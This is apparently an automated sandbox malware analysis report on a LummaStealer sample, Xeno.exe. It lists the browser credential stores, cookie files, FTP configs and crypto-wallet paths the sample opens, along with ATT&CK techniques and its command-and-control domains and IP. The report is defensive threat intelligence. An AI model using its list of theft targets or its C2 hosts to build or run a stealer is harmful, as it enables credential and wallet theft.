                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior

                      Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: Process Memory Space: Xeno.exe PID: 3020, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Xeno.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Xeno.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xeno.exe.3f99550.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xeno.exe.3f99550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1685351915.0000000000B92000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the count shown next to that technique in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation (12); PowerShell (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (211); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Virtualization/Sandbox Evasion (23); Disable or Modify Tools (1); Process Injection (211); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); Software Packing (1); Timestomp (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Query Registry (1); Security Software Discovery (231); Virtualization/Sandbox Evasion (23); Process Discovery (1); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (22); System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Screen Capture (1); Archive Collected Data (1); Data from Local System (41); Clipboard Data (3); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (21); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

Source | Detection | Scanner | Label
Xeno.exe | 47% | Virustotal |
Xeno.exe | 61% | ReversingLabs | ByteCode-MSIL.Trojan.LummaStealer
Xeno.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
jarry-deatile.bond | 0% | Avira URL Cloud | safe
pain-temper.bond | 0% | Avira URL Cloud | safe
https://sobrattyeu.bond/api7 | 0% | Avira URL Cloud | safe
stripedre-lot.bond | 0% | Avira URL Cloud | safe
immolatechallen.bond | 0% | Avira URL Cloud | safe
jarry-fixxer.bond | 0% | Avira URL Cloud | safe
crookedfoshe.bond | 0% | Avira URL Cloud | safe
https://sobrattyeu.bond/ | 0% | Avira URL Cloud | safe
sobrattyeu.bond | 0% | Avira URL Cloud | safe
growthselec.bond | 0% | Avira URL Cloud | safe
https://sobrattyeu.bond/TEQN7c | 0% | Avira URL Cloud | safe
https://sobrattyeu.bond/api | 0% | Avira URL Cloud | safe
strivehelpeu.bond | 0% | Avira URL Cloud | safe
https://sobrattyeu.bond/C | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
sobrattyeu.bond | 104.21.96.1 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
jarry-deatile.bond | true | Avira URL Cloud: safe | unknown
immolatechallen.bond | true | Avira URL Cloud: safe | unknown
stripedre-lot.bond | true | Avira URL Cloud: safe | unknown
jarry-fixxer.bond | true | Avira URL Cloud: safe | unknown
sobrattyeu.bond | true | Avira URL Cloud: safe | unknown
pain-temper.bond | true | Avira URL Cloud: safe | unknown
crookedfoshe.bond | true | Avira URL Cloud: safe | unknown
growthselec.bond | true | Avira URL Cloud: safe | unknown
https://sobrattyeu.bond/api | true | Avira URL Cloud: safe | unknown
strivehelpeu.bond | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://sobrattyeu.bond/api7 | Xeno.exe, 00000001.00000002.2942823706.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://sobrattyeu.bond/ | Xeno.exe, 00000001.00000002.2943363662.000000000356D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://upx.sf.net | Amcache.hve.4.dr | false | | high
https://sobrattyeu.bond/TEQN7c | Xeno.exe, 00000001.00000002.2942920179.0000000000D22000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://sobrattyeu.bond/C | Xeno.exe, 00000001.00000002.2943363662.000000000356D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.96.1 | sobrattyeu.bond | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1591988
Start date and time: 2025-01-15 16:15:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 46s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Xeno.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/5@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 33
• Number of non-executed functions: 108
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.22, 40.126.32.140, 172.202.163.200, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:16:07 | API Interceptor | 8x Sleep call for process: Xeno.exe modified
10:16:21 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.96.1 | k9OEsV37GE.exe | malicious | FormBook | www.uzshou.world/kbd2/?EtJTX=_JVX4ryxDRQpLJF&cNPH=ufZ7RYF4yLxNXVSq5Vx/4TYieRbcnKjskkbM3L5RbgB1pAgqHA7sfCNkYWLyXRMMwBB3JLbYKUw1FAOWml6VLpxPVZ4qXf58MsNUIQgw/PJ5HUGIvLQvrl5frN9PrRFpPiAd2cDcH6Sr
104.21.96.1 | gH3LlhcRzg.exe | malicious | FormBook | www.dejikenkyu.cyou/58m5/
104.21.96.1 | EIvidclKOb.exe | malicious | FormBook | www.mffnow.info/0pqe/
104.21.96.1 | zE1VxVoZ3W.exe | malicious | FormBook | www.aonline.top/fqlg/
104.21.96.1 | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | www.mzkd6gp5.top/3u0p/
104.21.96.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | pelisplus.so/administrator/index.php
104.21.96.1 | Recibos.exe | malicious | FormBook | www.mffnow.info/1a34/

Match | Associated Sample Name / URL | Detection | Threat Name | Context
sobrattyeu.bond | Adobe-Acrobat-Pro-2025.exe | malicious | LummaC, PureLog Stealer | 104.21.80.1
sobrattyeu.bond | random.exe | malicious | LummaC | 104.21.96.1

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | http://tweetfeed.live | malicious | Unknown | 104.21.90.88
CLOUDFLARENETUS | Adobe-Acrobat-Pro-2025.exe | malicious | LummaC, PureLog Stealer | 104.21.80.1
CLOUDFLARENETUS | xd.x86.elf | malicious | Mirai | 1.13.159.139
CLOUDFLARENETUS | setup.msi | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | Qj9gUbJBkY.dll | malicious | Wannacry | 8.44.41.1
CLOUDFLARENETUS | xd.spc.elf | malicious | Mirai | 172.69.125.196
CLOUDFLARENETUS | http://www.mcpf.co.za | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | MotivatedFunded.exe | malicious | LummaC Stealer | 162.159.135.233
CLOUDFLARENETUS | Set-Up.exe | malicious | LummaC | 104.21.75.15
CLOUDFLARENETUS | http://www.mcpf.co.za | malicious | Unknown | 104.17.25.14

Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Adobe-Acrobat-Pro-2025.exe | malicious | LummaC, PureLog Stealer | 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | MotivatedFunded.exe | malicious | LummaC Stealer | 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | Set-Up.exe | malicious | LummaC | 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | ActiVe_Ver_Set-UpFilE.exe | malicious | LummaC Stealer | 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | 00.ps1 | malicious | PureCrypter, LummaC, LummaC Stealer | 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | 00.ps1 | malicious | PureCrypter, LummaC, LummaC Stealer | 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | 138745635-72645747.116.exe | malicious | Unknown | 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | 92.255.57_1.112.ps1 | malicious | LummaC | 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | 2834573-3676874985.02.exe | malicious | Unknown | 104.21.96.1
                          No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.8843372462274467
Encrypted: false
SSDEEP: 192:35aGlFV5znpweA0LR3bQ1aOGzuiFfZ24IO8St:JRFvnBbLR3MafzuiFfY4IO8o
MD5: 37EE175D65AC09999713FC10A881D32C
SHA1: D0FD65C0AF63922CEBE6151708B61CDED58DE693
SHA-256: A287193AC21230FD2BCC6947C7EC0B650E8A5F1AD3D1ABEFA7D5259D862DA6A0
SHA-512: CD55C934D5C3C95201298650EFAFE93EF0BD0DE3EDFD2994ECADFE340A1CBC9405487345D7DDE1BAB40D11BADD058DB0FD7A1DF6B8B2CF49DAF4B2D89D57DF79
Malicious: true
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Wed Jan 15 15:16:06 2025, 0x1205a4 type
Category: dropped
Size (bytes): 154379
Entropy (8bit): 3.7657082819032177
Encrypted: false
SSDEEP: 1536:nA/RbuBojRapN4uE2aO2/LTg1hcASq02dCDEVfetTc1yJ:ADc4uEqILTg15MFw
MD5: 53A4D7BA332C38E2C2E8DF799F12B3C9
SHA1: A76E4F7A72416F4B4592CAC0A04EBCCDF8865907
SHA-256: D4941D01F241D9B3417618CD1592F7AFC2F55079BBA998429C437F2196104673
SHA-512: 2DBD190B3AA995347C6D8118E8172AA816ED19A2FA882BC127FF33CFF2EF050E3BE38584CEE387AAF55E4B4040874620C86D4D8D781848F35FB4D7F3EA69A3F4
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8356
Entropy (8bit): 3.6919959755642533
Encrypted: false
SSDEEP: 192:R6l7wVeJ0uX6x6Y9DSU99zgmfK2wVJkprt89bnMsfMtm:R6lXJt6x6YpSU99zgmf0VJLnff7
MD5: E4959C54BF96A61D63218F63C1092DD5
SHA1: 1EF3647DD17C5F33D8ABE52623F55D10F8483DD8
SHA-256: D88C073FE21C55D7ED8143EFA33B013E144101A31495266C8792D310CE44A5EA
SHA-512: B233FE1327A3F66202CD9159D6286DA4BBEE425667D4604EF01511CBA4A5A9774BCB3C2685764EE5383875863B5350F1CBEF708BFEB0F5074C5B9FDD4A691C7A
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4720
Entropy (8bit): 4.4339663858637515
Encrypted: false
SSDEEP: 48:cvIwWl8zsUNJg77aI9bIWpW8VYSYm8M4JwH3dxPcf6FvCM+q8vH3dxPcfEQlHUc2:uIjfUnI7dh7VmJwHQfuKHQfEQdUcUXd
MD5: C0063F9992D34163D9870267863675BE
SHA1: ED5601A5A7DB33E060929BED08BB4576BC77EC0C
SHA-256: B768B90F0F43399164AB0DAC08BD01705663A8E874D4EE8AC8BD1AE0CAE478CC
SHA-512: F8E750526003C42D6B8458A9AD81CD87C4899D702CAAADB2148B94FF2E956AD3D629EE641724D18E561FB16F0E0112C92CE81651C89085FD670BC61078D7096D
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677178" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.465555639896849
Encrypted: false
